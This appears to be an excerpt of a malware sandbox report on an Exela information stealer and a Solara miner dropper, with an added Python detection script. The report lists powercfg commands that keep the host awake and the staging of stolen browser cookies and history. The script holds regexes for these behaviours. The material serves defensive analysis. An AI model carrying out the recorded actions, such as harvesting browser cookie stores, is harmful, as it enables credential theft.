                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\libcrypto-1_1.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\libssl-1_1.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\multidict VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\pyexpat.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\python310.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_asyncio.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_bz2.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_cffi_backend.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_ctypes.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_socket.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\select.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_lzma.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_sqlite3.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_ssl.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_overlapped.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\multidict VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\multidict\_multidict.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_hashlib.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\yarl VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\yarl\_quoting_c.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\unicodedata.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\propcache VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\propcache\_helpers_c.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_writer.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_parser.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\mask.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\reader_c.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_uuid.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist\_frozenlist.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings\_rust.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_cffi_backend.cp310-win_amd64.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 76_2_00007FF75AE9D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,76_2_00007FF75AE9D080
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 76_2_00007FF75AEB5C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,76_2_00007FF75AEB5C70
                Source: C:\Users\user\Desktop\Solara.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings

                Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
                Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: svchost.exe, 00000000.00000002.2598324247.000001DBB1702000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                Source: svchost.exe, 00000000.00000002.2598324247.000001DBB1702000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
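                Two things in this report are directly usable as detection logic: the powercfg command lines above, with which the dropped binaries set the AC standby and hibernate timeouts to 0 (i.e. "never", so the miner is not interrupted by sleep), and the file events under Stealing of Sensitive Information below, where Exela.exe opens the Chrome, Edge and Firefox profile directories and writes its harvest into a GUID-named folder under %TEMP% (Browsers\Cookies.txt, system_info.txt, network_info.txt, process_info.txt). The `_MEI70882` directory it queries before that is PyInstaller's one-file extraction folder, and the `cp310-win_amd64.pyd` names show a bundled CPython 3.10 runtime, consistent with the Python Stealer and Exela Stealer detections. The script below is an added example written for this page, not code from the Joe Sandbox report or from the sample: it runs three checks over a handful of constructed Sysmon-style events. The event shape and field names (`type`, `image`, `cmdline`, `path`) are an assumption for the example; the command lines and paths are taken from this report, and the two benign control events are constructed.

```python
import ntpath
import re

# Constructed telemetry in a simplified Sysmon-like shape. The field names
# ("type", "image", "cmdline", "path") are an assumption made for this example,
# not Sysmon's real schema; the command lines and paths are copied from the report.
EVENTS = [
    {"type": "process", "image": r"C:\Users\user\AppData\Local\Temp\Solara.exe",
     "cmdline": r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"},
    {"type": "process", "image": r"C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe",
     "cmdline": r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0"},
    # Constructed benign control: changes a timeout, but not to "never sleep"
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powercfg.exe /x -monitor-timeout-ac 10"},
    {"type": "file", "image": r"C:\Users\user\AppData\Local\Temp\Exela.exe",
     "path": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"},
    {"type": "file", "image": r"C:\Users\user\AppData\Local\Temp\Exela.exe",
     "path": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state"},
    # Constructed benign control: the browser reading its own profile
    {"type": "file", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History"},
    {"type": "file", "image": r"C:\Users\user\AppData\Local\Temp\Exela.exe",
     "path": r"C:\Users\user~1\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\Browsers\Cookies.txt"},
]

# Browser images allowed to touch their own profile directories (the tuning point).
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

# powercfg /x (alias of /change) setting the AC or DC standby/hibernate timeout
# to 0, which means "never": the setting used to keep a mining host awake.
POWER_TAMPER = re.compile(
    r"powercfg(?:\.exe)?\b.*?[/-](?:x|change)\s+-?(?:standby|hibernate)-timeout-(?:ac|dc)\s+0(?!\d)",
    re.IGNORECASE,
)

# Profile roots of the three browser families the sample enumerates in the report.
BROWSER_STORES = re.compile(
    r"\\(?:Google\\Chrome|Microsoft\\Edge)\\User Data\\|\\Mozilla\\Firefox\\Profiles\\",
    re.IGNORECASE,
)

# The staging layout from the "File created" lines: %TEMP%\<GUID>\Browsers\... and
# the system_info / network_info / process_info text files next to it.
STAGING = re.compile(
    r"\\Temp\\[0-9A-F]{8}-(?:[0-9A-F]{4}-){3}[0-9A-F]{12}\\"
    r"(?:Browsers\\|(?:system|network|process)_info\.txt$)",
    re.IGNORECASE,
)


def flag_power_tamper(events):
    """Images that ran powercfg to disable standby or hibernation."""
    return [e["image"] for e in events
            if e["type"] == "process" and POWER_TAMPER.search(e["cmdline"])]


def flag_browser_store_access(events):
    """(image, path) pairs where a non-browser process reads a browser profile."""
    hits = []
    for e in events:
        if e["type"] != "file" or not BROWSER_STORES.search(e["path"]):
            continue
        if ntpath.basename(e["image"]).lower() in BROWSERS:
            continue  # a browser reading its own profile is expected
        hits.append((e["image"], e["path"]))
    return hits


def flag_stealer_staging(events):
    """Paths written into a GUID-named staging folder under %TEMP%."""
    return [e["path"] for e in events
            if e["type"] == "file" and STAGING.search(e["path"])]


def triage(events):
    """Run the three checks and roll them up into one verdict with evidence."""
    findings = {
        "power_tamper": flag_power_tamper(events),
        "browser_store_access": flag_browser_store_access(events),
        "stealer_staging": flag_stealer_staging(events),
    }
    findings["suspicious"] = any(
        findings[k] for k in ("power_tamper", "browser_store_access", "stealer_staging")
    )
    return findings


if __name__ == "__main__":
    for name, evidence in triage(EVENTS).items():
        print(f"{name}: {evidence}")
```

                Run stand-alone it reports the two powercfg invocations (Solara.exe and the ProgramData dropper), the two Exela.exe reads of the Edge cookie store and the Firefox profile, and the Cookies.txt staging path, while the monitor-timeout change and Chrome reading its own History are left alone. The browser allowlist is where false positives come from: backup agents, sync clients and EDR scanners also read these directories, so in production key the second check on the specific stores (Network\Cookies, History, Local Storage) rather than the profile root, and consider the first check high-confidence only when the caller is an unsigned binary in a user-writable location, as both callers are here. Note also that the Security Center provider STATE write at the top of this section comes from svchost.exe, that is, the Windows Security Center service recording a change in an antivirus provider's state; it is evidence of the AV state changing, not of the sample writing that key itself, whereas the powercfg lines are executed directly by the dropped binaries.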

                Stealing of Sensitive Information

                Source: Yara match | File source: 0000004D.00000003.2068669850.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000004D.00000003.2070969941.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000004D.00000003.2072039698.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000004D.00000002.2083587274.0000019BB56B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000004D.00000003.2074477936.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000004D.00000002.2084894174.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000004D.00000003.2069028034.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000004D.00000002.2083587274.0000019BB56B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user~1\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\Browsers\Cookies.txt
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user~1\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\Browsers\Firefox\History.txt
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user~1\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\system_info.txt
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user~1\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\network_info.txt
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File created: C:\Users\user~1\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\process_info.txt
